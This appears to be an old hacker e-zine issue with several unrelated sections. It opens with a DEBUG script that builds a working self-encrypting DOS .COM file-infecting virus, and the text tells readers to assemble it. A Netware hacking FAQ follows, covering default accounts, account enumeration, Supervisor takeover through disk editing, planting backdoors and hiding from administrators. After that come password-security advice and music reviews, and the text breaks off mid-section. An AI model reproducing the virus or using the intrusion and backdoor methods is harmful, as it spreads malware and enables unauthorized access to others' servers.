ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ If you don't have TASM/TLINK, just copy and past the debug script below to a new text file and then type: debug < filename and a file called gelf.com will appear. This is the virus so be careful. N GELF.COM E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 B4 2A CD 21 81 E 0110 FA 01 01 75 0D B4 09 BA 82 02 CD 21 B4 01 CD 21 E 0120 CD 19 E8 17 00 EB 28 90 00 00 E8 0F 00 B4 40 B9 E 0130 A2 01 8D 96 03 01 CD 21 E8 01 00 C3 3E 8B 9E 28 E 0140 01 8D B6 4F 01 B9 71 00 31 1C 46 46 E2 FA C3 8D E 0150 B6 7C 02 BF 00 01 A4 A5 B4 1A 8D 96 A5 02 CD 21 E 0160 B4 47 B2 00 BE 39 02 CD 21 B4 4E 8D 96 32 02 B9 E 0170 00 00 CD 21 73 03 E9 A4 00 B8 01 43 B9 00 00 8D E 0180 96 C3 02 CD 21 73 03 E9 82 00 B8 02 3D 8D 96 C3 E 0190 02 CD 21 72 56 93 B4 3F B9 03 00 8D 96 7C 02 CD E 01A0 21 72 48 3E 80 BE 7C 02 E9 74 40 B8 02 42 B9 00 E 01B0 00 BA 00 00 CD 21 72 33 2D 03 00 3E 89 86 80 02 E 01C0 B4 2C CD 21 02 D6 83 FB 00 74 F5 3E 89 9E 28 01 E 01D0 E8 57 FF B8 00 42 B9 00 00 BA 00 00 CD 21 72 0B E 01E0 B4 40 B9 03 00 8D 96 7F 02 CD 21 B8 01 43 3E 8B E 01F0 8E BA 02 8D 96 C3 02 CD 21 B8 01 57 3E 8B 8E BB E 0200 02 3E 8B 96 BD 02 CD 21 B4 3E CD 21 B4 4F E9 61 E 0210 FF B4 1A BA 80 00 CD 21 B8 00 01 50 C3 B4 3B BA E 0220 79 02 CD 21 72 03 E9 40 FF B4 3B BA 38 02 CD 21 E 0230 EB DF 2A 2E 63 6F 6D 00 5C 00 00 00 00 00 00 00 E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 E 0270 00 00 00 00 00 00 00 00 00 2E 2E 00 CD 20 00 E9 E 0280 00 00 5B 47 65 6C 66 5D 20 56 69 72 75 73 20 77 E 0290 72 69 74 74 65 6E 20 62 79 20 45 58 45 2D 47 65 E 02A0 6E 63 79 21 24 RCX 01A5 W Q _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Hacking Novell Netware By Husoft Section 00 General Info 00-1. What is this "FAQ" for? 00-2. What is the origin of this FAQ and how do I add to it? U 00-3. Is this FAQ available by anonymous FTP or WWW? --------------------------------------------------------------------------- Section 01 Access to Accounts U 01-1. What are common accounts and passwords in Novell Netware? U 01-2. How can I figure out valid account names on Novell Netware? 01-3. What is the "secret" method to gain Supervisor access Novell used to teach in CNE classes? 01-4. What is the cheesy way to get Supervisor access? 01-5. How do I leave a backdoor? N 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access? --------------------------------------------------------------------------- Section 02 Passwords 02-1. How do I access the password file in Novell Netware? 02-2. How do I crack Novell Netware passwords? N 02-3. What is a "brute force" password cracker? N 02-4. What is a "dictionary" password cracker? 02-5. How do I use SETPWD.NLM? 02-6. What's the "debug" way to disable passwords? N 02-7. Exactly how do passwords get encrypted? --------------------------------------------------------------------------- Section 03 Accounting and Account Security 03-1. What is Accounting? 03-2. How do I defeat Accounting? 03-3. What is Intruder Detection? N 03-4. How do I check for Intruder Detection? U 03-5. What are station/time restrictions? 03-6. How do I spoof my node or IP address? --------------------------------------------------------------------------- Section 04 The Console 04-1. How do I defeat console logging? 04-2. Can I set the RCONSOLE password to work for just Supervisor? N 04-3. How can I get around a locked MONITOR? --------------------------------------------------------------------------- Section 05 File and Directory Access 05-1. How can I see hidden files and directories? 05-2. How do I defeat the execute-only flag? 05-3. How can I hide my presence after altering files? 05-4. What is a Netware-aware trojan? 05-5. What are Trustee Directory Assignments? 05-6. Are there any default Trustee Assignments that can be exploited? 05-7. What are some general ways to exploit Trustee Rights? 05-8. Can access to .NCF files help me? --------------------------------------------------------------------------- Section 06 Fun with Netware 4.1 06-1. What is interesting about Netware 4.x's licensing? N 06-2. How can I tell if something is being Audited? N 06-3. Where are the Login Scripts stored and can I edit them? N 06-4. What is the rumored "backdoor" in NDS? N 06-5. How can I remove NDS? N 06-6. How can I remove Auditing if I lost the Audit password? N 06-7. Does 4.x store the LOGIN password to a temporary file? N 06-8. Everyone can make themselves equivalent to anyone including Admin. How? N 06-9. Can I reset an NDS password with just limited rights? N 06-10. What is OS2NT.NLM? N 06-11. Do you have to be Admin equivalent to reset a password? --------------------------------------------------------------------------- Section 07 Miscellaneous Info on Netware 07-1. Why can't I get through the 3.x server to another network via TCP/IP? 07-2. How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF? 07-3. How can I login without running the System Login Script? 07-4. How do I remotely reboot a Netware 3.x file server? 07-5. How can I abend a Netware server? And why? 07-6. What is Netware NFS and is it secure? 07-7. Can sniffing packets help me break in? N 07-8. What else can sniffing get me? 07-9. How does password encryption work? N 07-10. Are there products to help improve Netware's security? 07-11. What is Packet Signature and how do I get around it? N 07-12. Do any Netware utilities have holes like Unix utilities? --------------------------------------------------------------------------- Section 08 Resources U 08-1. What are some Netware FTP locations? 08-2. Can I get files without FTP? U 08-3. What are some Netware WWW locations? 08-4. What are some Netware USENET groups? 08-5. What are some Netware mailing lists? 08-6. Where are some other Netware FAQs? U 08-7. Where can I get the files mentioned in this FAQ? 08-8. What are some good books for Netware? --------------------------------------------------------------------------- Section 09 Netware APIs 09-1. Where can I get the Netware APIs? U 09-2. Are there alternatives to Netware's APIs? --------------------------------------------------------------------------- Section 10 For Administrators Only U 10-1. How do I secure my server? 10-2. I'm an idiot. Exactly how do hackers get in? N 10-3. I have xxx setup and xxx version running. Am I secure? --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 00 General Info --------------------------------------------------------------------------- 00-1. What is this "FAQ" for? This FAQ contains information about hacking Novell Netware. It is intented to show what and how regarding hacking on Netware, and by illustrating this in explicit detail show how sys admins can improve security and prevent break-ins. Most of the information in this FAQ was compiled and collected from various sources freely available on the Internet. In fact, most of the information here is OLD info for serious Netware hackers. Some of the info was collected from these serious Netware hackers, and still more was collected from "tiger team" security sweeps that I have been involved in. You will also find hints and generally good ideas for improving and/or expanding an existing system. This FAQ is a good reference for sys admins as well as hackers. --------------------------------------------------------------------------- 00-2. What is the origin of this FAQ and how do I add to it? Send comments about info in this FAQ to thegnome@fastlane.net. Simple flames about typos, the "that's not right" one liners will be ignored. If you wish to contribute corrections please include your research and source of facts. Also if you wish to add your information, I will include it if I can include your email address, unless I can verify the info independently. This way if someone has questions, they can bug you, not me. --------------------------------------------------------------------------- 00-3. Is this FAQ available by anonymous FTP or WWW? Look for it in the following locations: jumper.mcc.ac.uk /pub/security/netware faq.zip ftp.fastlane.net /pub/nomad/nw faq.zip ftp.best.com /pub/almcepud/hacks faq.zip ftp://infonexus.com/pub/Philes/FAQS/netwareHack.faq.txt.gz http://resudox.net/bio/mainpage.html in the Netware section. Entire FAQ Online, and the reason Al has fits with his ISP ;-): http://www.interlog.com/~apayne/nwhack.html --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 01 Access to Accounts --------------------------------------------------------------------------- 01-1. What are common accounts and passwords in Novell Netware? Out of the box Novell Netware has the following default accounts - SUPERVISOR, GUEST, and Netware 4.x has ADMIN and USER_TEMPLATE as well. All of these have no password to start with. Virtually every installer quickly gives SUPERVISOR and ADMIN a password. However, many locations will create special purpose accounts that have easy-to-guess names, some with no passwords. Here are a few and their typical purposes: Account Purpose ---------- ------------------------------------------------------ PRINT Attaching to a second server for printing LASER Attaching to a second server for printing HPLASER Attaching to a second server for printing PRINTER Attaching to a second server for printing LASERWRITER Attaching to a second server for printing POST Attaching to a second server for email MAIL Attaching to a second server for email GATEWAY Attaching a gateway machine to the server GATE Attaching a gateway machine to the server ROUTER Attaching an email router to the server BACKUP May have password/station restrictions (see below), used for backing up the server to a tape unit attached to a workstation. For complete backups, Supervisor equivalence is required. WANGTEK See BACKUP FAX Attaching a dedicated fax modem unit to the network FAXUSER Attaching a dedicated fax modem unit to the network FAXWORKS Attaching a dedicated fax modem unit to the network TEST A test user account for temp use ARCHIVIST Palidrome default account for backup CHEY_ARCHSVR An account for Arcserve to login to the server from from the console for tape backup. Version 5.01g's password was WONDERLAND. Delete the Station Restrictions and use SUPER.EXE to toggle this account and you have an excellent backdoor. WINDOWS_PASSTHRU Although not required, per the Microsoft Win95 Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you need this for resource sharing without a password. This should give you an idea of accounts to try if you have access to a machine that attaches to the server. A way to "hide" yourself is to give GUEST or USER_TEMPLATE a password. Occassionally admins will check up on GUEST, but most forget about USER_TEMPLATE. In fact, _I_ forgot about USER_TEMPLATE until itsme reminded me. --------------------------------------------------------------------------- 01-2. How can I figure out valid account names on Novell Netware? Any limited account should have enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory. If you get in, type SYSCON and enter. Now go to User Information and you will see a list of all defined accounts. You will not get much info with a limited account, but you can get the account and the user's full name. If your in with any valid account, you can run USERLST.EXE and get a list of all valid account names on the server. If you don't have access (maybe the sys admin deleted the GUEST account, a fairly common practice), you can't just try any account name at the LOGIN prompt. It will ask you for a password whether the account name is valid or not, and if it is valid and you guees the wrong password, you could be letting the world know what you're up to if Intruder Detection is on. But there is a way to determine if an account is valid. From a DOS prompt use a local copy (on your handy floppy you carry everywhere) of MAP.EXE. After you've loaded the Netware TSRs up through NETX or VLM, Try to map a drive using the server name and volume SYS:. For example: MAP G:=TARGET_SERVER/SYS:APPS Since you are not logged in, you will be prompted for a login ID. If it is a valid ID, you will be prompted for a password. If not, you will immediately receive an error. Of course, if there is no password for the ID you use you will be attached and mapped to the server. You can do the same thing with ATTACH.EXE: ATTACH TARGET_SERVER/loginidtotry The same thing will happen as the MAP command. If valid, you will be prompted for a password. If not, you get an error. Another program to check for valid users and the presence of a password is CHKNULL.EXE by itsme. This program checks for users and whether they have a password assigned. In 4.1 CHKNULL shows you every account with no password and you do not have to be logged in. For this to work bindery emulation must be on. But there is another way to get them in 4.1: Once you load up the VLMs you may be able to view the entire tree, or at least all of the tree you could see if logged in. Try this: CX /T /A /R During the installation of 4.1, [Public] has browse access to the entire tree because [Public] is added to [Root] as a Trustee. The Inherited Rights Filter flows this stuff down unless explicitly blocked. If you have the VLMs loaded and access to CX, you don't even have to log in, and you can get the name of virtually every account on the server. --------------------------------------------------------------------------- 01-3. What is the "secret" method to gain Supervisor access Novell used to teach in CNE classes? Before I start this section, let me recommend another solution, my God, ANY other solution is better than this! If you are running 3.x, jump to the end of this section. The secret method is the method of using a DOS-based sector editor to edit the entry in the FAT, and reset the bindery to default upon server reboot. This gives you Supervisor and Guest with no passwords. The method was taught in case you lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed. While you get a variety of answers from Novell about this technique, from it doesn't work to it is technically impossible, truth be it it can be done. Here are the steps, as quoted from comp.os.netware.security, with my comments in [brackets]: [start of quote] A Netware Server is supposed to be a very safe place to keep your files. Only people with the right password will have access to the data stored there. The Supervisor (or Admin) user's password is usually the most well kept secret in the company, since anyone that has that code could simply log to the server and do anything he/she wants. But what happens if this password is lost and there's no user that is security-equivalent to the supervisor? [Use SETPWD.NLM, instead of this process, see section 02-3 - S.N.] What happens if the password system is somehow damaged and no one can log to the network? According to the manual, there's simply no way out. You would have to reinstall the server and try to find your most recent backup. Fortunately, there is a very interesting way to gain complete access to a Netware server without knowing the Supervisor's (or Admin's) password. You may imagine that you would have to learn complex decryption techniques or even type in a long C program, but that's not the case. The trick is so simple and generic that it will work the same way for Netware 2.x, 3.x and 4.x. The idea is to fool Netware to think that you have just installed the server and that no security system has been estabilished yet. Just after a Netware 2.x or 3.x server is installed, the Supervisor's password is null and you can log in with no restriction. Netware 4.x works slightly differently, but it also allows anyone to log in after the initial installation, since the installer is asked to enter a password for the Admin user. But how can you make the server think it has just been installed without actually reinstalling the server and losing all data on the disk? Simple. You just delete the files that contain the security system. In Netware 2.x, all security information is stored in two files (NET$BIND.SYS and NET$BVAL.SYS). Netware 3.x stores that information in three files (NET$OBJ.SYS, NET$VAL.SYS and NET$PROP.SYS). The all new Netware 4.x system stores all login names and passwords in five different files (PARTITIO.NDS, BLOCK.NDS, ENTRY.NDS, VALUE.NDS and UNINSTAL.NDS [This last file may not be there, don't worry - S.N.]). One last question remains. How can we delete these files if we don't have access to the network, anyway? The answer is, again, simple. Altough the people from Novell did a very good job encrypting passwords, they let all directory information easy to find and change if you can access the server's disk directly, using common utilities like Norton's Disk Edit. Using this utility as an example, I'll give a step-by-step procedure to make these files vanish. All you need is a bootable DOS disk, Norton Utilities' Emergency Disk containing the DiskEdit program and some time near the server. 1. Boot the server and go to the DOS prompt. To do this, just let the network boot normally and then use the DOWN and EXIT commands. This procedure does not work on old Netware 2.x servers and in some installations where DOS has been removed from memory. In those cases, you'll have to use a DOS bootable disk. 2. Run Norton's DiskEdit utility from drive A: 3. Select "Tools" in the main menu and then select "Configuration". At the configuration window, uncheck the "Read-Only" checkbox. And be very careful with everything you type after this point. 4. Select "Object" and then "Drive". At the window, select the C: drive and make sure you check the button "physical drive". After that, you'll be looking at your physical disk and you be able to see (and change) everything on it. 5. Select "Tools" and then "Find". Here, you'll enter the name of the file you are trying to find. Use "NET$BIND" for Netware 2, "NET$PROP.SYS" for Netware 3 and "PARTITIO.NDS" for Netware 4. It is possible that you find these strings in a place that is not the Netware directory. If the file names are not all near each other and proportionaly separated by some unreadable codes (at least 32 bytes between them), then you it's not the place we are looking for. In that case, you'll have to keep searching by selecting "Tools" and then "Find again". [In Netware 3.x, you can change all occurences of the bindery files and it should still work okay, I've done it before. - S.N.] 6. You found the directory and you are ready to change it. Instead of deleting the files, you'll be renaming them. This will avoid problems with the directory structure (like lost FAT chains). Just type "OLD" over the existing "SYS" or "NDS" extension. Be extremely careful and don't change anything else. 7. Select "Tools" and then "Find again". Since Netware store the directory information in two different places, you have to find the other copy and change it the same way. This will again prevent directory structure problems. 8. Exit Norton Disk Edit and boot the server again. If you're running Netware 2 or 3, your server would be already accessible. Just go to any station and log in as user Supervisor. No password will be asked. If you're running Netware 4, there is one last step. 9. Load Netware 4 install utility (just type LOAD INSTALL at the console prompt) and select the options to install the Directory Services. You be prompted for the Admin password while doing this. After that, you may go to any station and log in as user Admin, using the password that you have selected. What I did with Norton's Disk Edit could be done with any disk editing utility with a "Search" feature. This trick has helped me save many network supervisors in the last years. I would just like to remind you that no one should break into a netware server unless authorized to do it by the company that owns the server. But you problably know that already. [end of quote] I actually had this typed up but kept changing it, so I stole this quote from the newsgroup to save me retyping ;-) Now the quicky for 3.x users. Use LASTHOPE.NLM, which renames the bindery and downs the server. Reboot and you have Supe and Guest, no password. --------------------------------------------------------------------------- 01-4. What is the cheesy way to get Supervisor access? The cheesy way is the way that will get you in, but it will be obvious to the server's admin that the server has been compromised. This technique works for 3.11. Using NW-HACK.EXE, if the Supervisor is logged in NW-HACK does the following things. 1) The Supervisor password is changed to SUPER_HACKER, 2) every account on the server is made a supe equivalent, and 3) the sys admin is going to know very quickly something is wrong. What the admin will do is remove the supe rights from all accounts that are not supposed to have it and change the Supervisor password back. The only thing you can do is leave a backdoor for yourself (see next question). --------------------------------------------------------------------------- 01-5. How do I leave a backdoor? Once you are in, you want to leave a way back with supe equivalency. You can use SUPER.EXE, written for the express purpose of allowing the non-supe user to toggle on and off supe equivalency. If you use the cheesy way in (previous question), you turn on the toggle before the admin removes your supe equivalency. If you gain access to a supe equivalent account, give Guest supe equivalency and then login as Guest and toggle it on. Now get back in as the original supe account and remove the supe equivalency. Now Guest can toggle on supe equivalency whenever it's convenient. Of course Guest doesn't have to be used, it could be another account, like an account used for e-mail administration or an e-mail router, a gateway's account, you get the idea. Now SUPER.EXE is not completely clean. Running the Security utility or Bindfix will give away that an account has been altered at the bindery level, but the only way for an admin to clear the error is to delete and rebuild the account. Another backdoor is outlined in section 02-2 regarding the replacement LOGIN.EXE and PROP.EXE --------------------------------------------------------------------------- 01-6. I don't have SETPWD.NLM or a disk editor. How can I get Supe access? If you have two volumes or some unallocated disk space you can use this hack to get Supe. Of course you need physical access but it works. I got this from a post in comp.os.security.netware - Dismount all volumes - Rename SYS: to SYSOLD: - Rename VOL1: (or what ever) to SYS: or create new SYS: on new disk - Reboot server - Mount SYS: and SYSOLD: - Attach to server as Supervisor (Note: login not available) - Rename SYSOLD:SYSTEM\NET$***.SYS to NET$****.OLD - Dismount volumes - Rename volume back to correct names - Reboot server - Login as Supervisor, no password due to new bindery - Run BINDREST - You are currently logged in as Supe, you can create a new user as Supe equiv and use this new user to reset Supe's password, whatever. --------------------------------------------------------------------------- --------------------------------------------------------------------------- Section 02 Passwords --------------------------------------------------------------------------- 02-1. How do I access the password file in Novell Netware? Contrary to not-so-popular belief, access to the password file in Netware is not like Unix - the password file isn't in the open. All objects and their properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS database in 4.x. An example of an object might be a printer, a group, an individual's account etc. An example of an object's properties might include an account's password or full user name, or a group's member list or full name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. Their names are as follows: Netware version File Names --------------- ---------- 2.x NET$BIND.SYS, NET$BVAL.SYS _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: Password Security: The Core of Protection By: HuSoft Virtualy every computer service to which you log in employs a simple password protection scheme. Your account is assigned a unique user name and a password, both of which you must type in order to log in. Generally, the system administration staff will allow (and even encourage) you to change your own password; some systems employs automated processes that insist that you make such changes periodically. One of the simplest ways that intruders compromise password security is by repetitively trying possible passwords against known valid user ID's. This process can be conducted via automated process; the intruder uses a computer program to attempt the break-in. One scheme, sometimes called "attack guessing" tries to determine a real password by seeing if any of a long list of candidate passwords in fact allows entry. Most systems will hang up a connection after a several failed attempts to log in, but they may not detect repeated connections. Moreover, it is relatively common for Unix password files to be available to prying eyes. This is possible because these files are encrypted, so possession of the file does not equate to discovery of passwords. However, once a password file is in the hands of a would-be intruder, special "cracker" software will repetitively encrypt candidate passwords and try them against the encrypted form. There are some straightfoward rules fo account and password administration, but many users fail to take heed. If you follow these rules, the chances of your account being compromised are greatly reduced. If you fail to follow these rules, you are asking for trouble. 1. Pick a password that does not relate in some obvious way to you. Do not use the name of your spouse, your child, or your pet. Do not use your initials, your telephone number, or your mascot of your alma mater. These pieces of information may be much more publick than you realice. 2. It is best to choose a word that is not a real word in any language. Some "attack guesing" schemes check to see if words out of standard dictionaries happen to match your password. A good approach is to pick the first letter of each word of a sentence that only you would devise. 3. Opt for a longer password over a short one. If your system allows eight character passwords, use all eight characters instead for three or four. Shorter passwords are more easily matched by cracker programs. If your system allows you to use mixed case letters as well as special characters, this can also make the password harder to crack. (It can also make the password harder to remember). 4. If you write a password down, put the paper copy in a secure place. Some guidelines suggest that you never write down a password, but the practical realty is that humans inevitably will do this. 5. Do not reveal your password to anyone. A new generation of network conartist sometimes employs the scam of masquerading as a security expert trying to catch an intruder, if only you will assist by providing your password. Don't fall for it. 6. Do not use the same password on multiple services. This rule is especially important, and especially often ignored. You cannot trust that all system administrators will protect your password. In particular, a dial-up bulletin board service run by a lone sysop out of his bedroom is not likely to have the same level of security as a major Internet service provider. In the event of a major break-in, your password becomes the key to all the systems you have access to-unless you vary password used on diferent services. 7. If you have any reason to believe a password has been compromised, change it immediately. Change passwords frequently in any event. 8. Most systems will provide you with information as the last time you logged in, as well as the last time someone attempt to log in, but failed. This is usefull information - but the tendency is to let it scroll by unread. If you notice activity that doesn't correspond to your logins, change your password and contact your system administrator. If you become an information provider running your own system, there are some special points to consider: 1. Some computer operating systems are delivered with a set of "stock" initial passwords. Unless you change these passwords - all of them - you are exposed to a very simple attack from someone who has the manuals for the same system. 2. When you are away from the system you administer, be very cautious about logging in over the internet using secure passwords. An unscrupulous local administrator or user could be listening in. Consider isolating your everyday tasks, suck as reading mail, on a user ID that has no special privileges. 3. Many computer systems offer logging facilities that allow you to inspect patterns of use and abuse - for instance repeatedly failed login attempts. Use these tools to keep your eyes out for intruders. Use both the loggin facilities of the native operating system and whatever tools you may install. 4. Most corporate and campus networks have network administrators whose jobs include security. Ask your network administrator to audit your system setup to be sure it is secure. Also ask your network administrator to sign you up for local distrubution of the Computer Emergency Response Team (CERN) mailing list. These reports detail specific weaknesses discovered in various flavors of various operating systems, and they tell system administrators how to work arround these flaws while waiting for vendor responses. 5. If you install public client programs - programs that allow users to avail themselves of services without authentication - make sure the environment opened to these users is secure. Watch for openings in programs like more and telnet that may allow users more privilege than you want to offer to users whose identity is not known. *Your local network administrator should be able to offer advice. The basic mode of operation of Ethernet and other local area networks that employ shared media implies a certain inherent opportunity for intruders to "sniff" passwords. On large corporate and campus networks, this exposure can be isolated to departments or buidings through the use of routers. In some cases, where security of communication across a campus or wide-area links is essential, network administrators may acquire and install routers with builtin encryption capability. If you work on a campus or corporate network, and you are concerned about this aspect of security, ask your LAN or campus network administrator for detalis as the level of exposure. _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: TRACKED MUSIC REVIEWS ~~~~~~~~~~~~~~~~~~~~~ By: Walrus & CrossFire This section is running in conjunction with http://walrus.bog.net/. All of the tunes and mixes reviewed by me (Walrus) are available for listening or downloading from my site. Tracks that CrossFire reviews may also be there, but no promises. Where possible, a URL will be supplied. Well that's the theory anyway. A big shout goes out to Emulation who had donated 500Mb of server space on http://www.oldskool-hardcore.i12.com/ to allow this to continue, and to frOsty who is hosting a few of the mixes on http://www.tbp.mb.ca/audio/. Thanks to both of them. Not all the tracks and mixes that we review are happy hardcore. We review oldskool, techno, drum 'n' bass, trance and more. Yes, even Gabber. Although we tend to stick to hardcore. If you would like either of us to review any tracks or mixes, send mods/mp3s/vqfs/realaudios or whatever your chosen format is to up_reviews@hotmail.com and either me or CrossFire will review it. Please don't send huge files though. For example, sending a 1 hour mix in mp3 format is not appropriate. If you want an address to send records/CDs/tapes to, just drop one of us an email. This month's reviews: ~~~~~~~~~~~~~~~~~~~~~ Title: DJ Dodgee - Untitled mixtape 2 Reviewed by: Walrus Available from: http://walrus.bog.net Style: Happy Hardcore Tracklist: Kaos & Darkcyde - Tubular Vibes BDB feat. Lisa A - I Want You 2 Mental - Generation Love E-Logic - The Gate Class of '94 - Lift You One Stage Higher Robbie Long & Devestate feat. Leroy - Flip Flop Flava Brisk & Trixxy - Eye Opener (Brisk '99 remix) Hixxy - Starry Night Slipmatt & Eruption - Bust The New Jam (Brisk remix) B'n'H vol.1 Supernova - Go DJ Bang - Give Me A Reason Vinylgroover - John Gotti's Revenge Tayla & Blade - Hamburg Rapido - Ultraviolet Bang - Hyperspace When I reviewed one of Dodgee's mixes in the last issue, I said: "Expect to see more from Dodgee, with a slightly more refined sound". That more refined sound is very apparant on this tape. The mixing is smoother overall. The punches are better, and there's even more of that excellent scratching. As for the tracks, there's an absolutely excellent selection of tracks in there. Not much to keep the cheezers happy though, so if that's your style give it a miss, but overall this tape comes highly reccomended. Title: DJ Skippy - Awakening Reviewed by: Walrus Available from: http://walrus.bog.net Style: Happy Hardcore This track by DJ Skippy has not (yet) been scheduled for release, but may appear on a Skippin Trax release sometime in the future. Its a fairly trancey affair which sounds a little like the Braveheart theme. There's nice little synth lines dropped in all over the place intersperced with pianos and the like, and every time I listen to it, I seem to hear something which I didn't notice first time round. This is an absolutely solid tune in my opinion. Deserves to be released as soon as possible. Title: DJ Skippy - Skippin Trax 002 Reviewed by: Walrus Available from: http://walrus.bog.net Style: Happy Hardcore Skippin Trax 002 is going to have 3 tracks on it, and will probably be released in mid-late November. I have reviewed 2 of the tracks from it here, as the other one hasn't been written/recorded yet. Side A (Energy 2000) is a happy, bouncey track using a few well known samples ("spread out and scatter" anybody?). Lots of different stuff going on here, but not fragmented. The track manages to be very happy without being cheezy. There's even some nice stompy bassdrum in there to shake the floor with. Side B (Mystery) starts off with some good breakbeats and basslines and bounces along nicely with a few little vocal samples before bringing in some trancy synths. The track really picks up with a big bassdrum fill and bounces along with the same trancey synths until it picks up the breakbeats again for the outro. On the basis of the two tracks I have reviewed here (remember there's going to be another one on there too) I advise anybody who likes their happy hardcore to go out and buy this record when it is released. Title: DJ Sparkey - Hardcore Crazy Reviewed by: Walrus Available from: http://walrus.bog.net Style: Happy Hardcore/Gabber This is a cool track. At 210bpm and with its hard loud kickdrums at the beginning, its fairly gabber-esque. But at the same time there's an element of happy hardcore in there. Although it does seem to lack something where the piano line is introduced, it quickly picks up, and regains a lot of the harder elements of the track. I haven't really heard anybody mix happycore and gabber together like this before, and it works surprisingly well. Don't forget to check out Sparkey's show on Inside Beat. Check out www.inside-beat.net for details of tuning in. Title: DJ Sparkey - Hardcore Frills Reviewed by: Walrus Available from: http://walrus.bog.net Style: Happy Hardcore This track starts off a bit weak, with a single piano line, but improves as basslines and breakbeats are added to it. For a while it sounds fairly cool. However the track just loses it somewhere along the line, and never really goes anywhere. It ends up as a fairly cheezy afair. Its OK, but Hardcore Crazy is a much better track. Title: DJ Smurf - Gabba Dabba Doo - 160 Shits Per Minute (Mixtape) Reviewed by: CrossFire Available from: Email smurf: Glen_Peterson@qsp.co.uk Style: Gabber TrackListing: Dr Macabre - Ghost Stories (Powerplant) Omar Santana - Digital Domain (H2OH) The Horrorist - Flesh Is The Fever (Things To Come) Boombastic - Leaders Of The New School (Baby Boom) DJ Promo - Guns & Ammo (ID&T) DJ Sim - Simbiosis (ID&T) The Masochist - Cold Cage (ID&T) Bass D & King Matthew - How Shall I (ID&T) Rotterdam Terror Corps - Beethoven On XTC (Dark Twins Remix) (Megarave) Doomaniac - Beat On Da Kick Drum (Mindcrash) Dr Macabre - Danse Macabre (Megarave) Members Of Megarave - Maniac (Megarave) Evil Activities - Darkness Of Noom (Rotterdam) DJ Mad E Fact - The Hustle (Baby Boom) Damien Kelly & Attic & Stylz - State Of The Nation (Hollow Point) Damien Kelly & The Unknown MC - The People Want More (Hollow Point) Mmm, This is an interesting one this is - or maybe I'm just refering to the image on the cover, which features a pic of a woman with her arse out :) The Mixing, As Always With Smurf, Is Excellent, and the tape has some *brilliant* Tunage On There. What I am surprised about is the fact the tape is quite slow - 160 Bpm. Theres a few tracks on there I've heard on Happy Hardcore tapes, most notably Bass D & King Matthew - How Shall I, and Damien Kelly & Attic & Stylz - State Of The Nation. Overall this is an excellent tape, which proves smurf is one to look out for. Title: Andreas Viklund - Sweet Things Reviewed by: CrossFire Available from: http://www.traxinspace.com (Title Search) Style: Dance-Pop Oh Yes! This Starts off with some nice pianos, before dipping into a vengaboys-esque intro (I don't Mean that in a bad way) , and then breaking down into the main melody. The whole song is really cutesy, but cutesy in a good way. Overall I think this track is excellent - Nice One Mr Viklund! Title: Xentar - Tears Of Happiness Reviewed by: CrossFire Available from: ftp://ftp.scene.org/pub/music/groups/te/te-tears.zip Style: Happy Hardcore Mmm, Breakbeats :) This song starts off with some lovely breakbeats before dropping into the main loop that isn't too disimilar from another Happycore track which i can't remember the name off. Anyway, this continues for a while, before breaking down a bit and a new instrumental loop starts. This track Seems to be a reflection of the stuff being released in the happy hardcore scene at the moment, and although this track is better than most commercial efforts, it's nowt outstanding. Title: DipA - The Light Of Love Reviewed by: CrossFire Available from: http://www.traxinspace.com/exe-bin/downloadfile.asp?SongID=16622 Style: Dance Woah! Lovely lovely fantasy style intro :)) This Track is a beauty - It is done in a kind of Demo Style (i mean the kind of music you would hear in a demo), sorta like something you would here in a fantasy game, but a bit more up tempo. The Song itself builds up really nicely, and then as usual starts another instrumental loop. A bit of a short 'un at 2 Minutes 55 secs, but overall an excellent track done by a very nice guy :) Title: DJ Creativity - Oldskool Vol. 5 (Mixtape) Reviewed by: Walrus Available from: http://walrus.bog.net Style: Oldskool No tracklist available This is proper a oldskool mix. Not just '94-'95 happy hardcore tracks which some people seem to think is oldskool. Most of the tracks are from '92-'93, and there's some excellent tracks on there. The mixing compliments the track selection excellently, everything is nice and smooth - just the way it should be. Excellent stuff. Title: Modulo-2 - Smile and Nod Reviewed by: Walrus Available from: http://walrus.bog.net Style: Bit of everything This is a 14 track album by a Canadian duo. There's a mix of hardcore, happy hardcore, drum 'n' bass and trancecore on here. The standard of production is excellent across the board. I like some of the tracks, and I'm not so keen on others. This is the problem with covering such a range of genres, but I'm certain that there's a bit of something for everybody on this CD. The best track on the CD (IMHO) is definitely Peace Love Unity Revengewhich is an excellent jungle/drum 'n' bass stylee tune. Whatever you're into, I'm sure you'll love this CD. Disclaimer: If you don't like what we say about your music then tough shit. We both review tracks and mixes fairly regardless of how much we (dis)like the person who made it. These are our opinions. You may not agree with them. Walrus (ergophobe@dial.pipex.com) CrossFire (crossfire@hackers-uk.freeserve.co.uk) _____ _____ ___ ___ __ __ / | \| _ \ \ \/ /| | | / \ __/ \ / | | | \ / | \ / | | | \_____/|__| \/ |__|__| PRESENTS: 0800 Scans ~~~~~~~~~~ By: ergophobe Before this month's UK hand scans (hopefully a 